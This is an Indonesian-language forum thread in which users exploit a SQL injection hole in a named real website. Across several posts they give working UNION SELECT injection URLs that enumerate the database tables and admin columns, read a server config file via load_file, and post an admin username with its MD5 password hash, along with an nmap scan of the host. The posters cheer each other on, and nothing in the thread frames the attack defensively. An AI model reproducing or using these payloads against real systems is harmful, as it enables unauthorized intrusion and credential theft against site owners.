Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Posted: **Tue Jun 01, 2010 11:23 pm**

di alamat ini

http://www.itmaasia.com/news.php?id=%271

ada code aneh....

mncul pesan :

MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT * FROM tb_news WHERE news_id=\'1 ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1' at line 1 ) [3] => Array ( [errno] => 1064 ) )

Posted: **Wed Jun 02, 2010 8:51 am**

itu hole kk

Code: Select all

http://www.itmaasia.com/news.php?id=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,version%28%29,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

nih contohnya ^^
hajar kk

Posted: **Wed Jun 02, 2010 7:58 pm**

ini table dari databasenya

Code: Select all

http://www.itmaasia.com/news.php?id=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,group_concat%28table_name%29,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.tables%20where%20table_schema=database%28%29--

ada tabel adminya loh, trus injek lagi ke tb_admin

Code: Select all

http://www.itmaasia.com/news.php?id=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,group_concat%28column_name%29,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_name=0x74625f61646d696e--

dapat deh tuh admin ama passwordnya

Code: Select all

wanhu:934f9012bc20d2aa4713f45afcb9a076

tinggal crack password dan cari login pagenya
:devil :devil :devil

Posted: **Wed Jun 02, 2010 10:19 pm**

udah cari kemana-mana tapi gk dapat juga password md5x.....

Posted: **Wed Jun 02, 2010 11:26 pm**

I wish this is more useful...
U can see how the page connect to database server:

Code: Select all

http://www.itmaasia.com/news.php?id=-1+union+select+1,2,@@basedir,4,5,6,7,8,9,10,load_file(0x443a5c77656278616d70705c78616d70705c6874646f63735c6369746d655c636f6e6669675c64622e706870),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user--

I don't know maybe this is usefull too:

Code: Select all

http://www.itmaasia.com/member_modi_n_english.php?mem_name=wanhu

Port Scanner:

Code: Select all

$nmap -A www.itmaasia.com

Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-02 23:51 CIT
Nmap scan report for www.itmaasia.com (123.196.114.101)
Host is up (0.33s latency).
Not shown: 994 filtered ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Serv-U ftpd 8.0
22/tcp    open  ssh           (protocol 2.0)
80/tcp    open  http          Apache httpd 2.2.11 ((Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9)
|_html-title: ITMA ASIA + CITME 2010
3389/tcp  open  microsoft-rdp Microsoft Terminal Service
6059/tcp  open  tcpwrapped
49155/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=5.21%I=7%D=6/2%Time=4C067E02%P=i686-pc-linux-gnu%r(NULL,18
SF:,"SSH-2\.0-Serv-U_8\.0\.0\.7\r\n");
Service Info: OS: Windows

I only could help U until this step...!!!

Posted: **Fri Jun 04, 2010 4:45 pm**

@kk 3xtr3m3b0y

:love: :love: kren kk...ijin nyimak ilmu'a....y..

Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Ni Hole to bukan...???

Ni Hole to bukan...???

Re: Ni Hole to bukan...???

Re: Ni Hole to bukan...???

Re: Ni Hole to bukan...???

Re: Ni Hole to bukan...???

Re: Ni Hole to bukan...???